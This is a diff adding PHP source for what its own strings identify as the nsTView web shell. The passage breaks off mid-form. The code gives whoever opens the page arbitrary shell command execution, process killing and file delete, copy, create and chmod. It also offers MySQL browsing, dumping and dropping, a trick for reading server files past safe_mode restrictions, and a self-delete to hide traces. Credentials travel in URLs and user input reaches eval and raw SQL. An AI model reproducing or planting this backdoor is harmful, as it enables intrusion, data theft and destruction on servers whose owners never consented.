+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
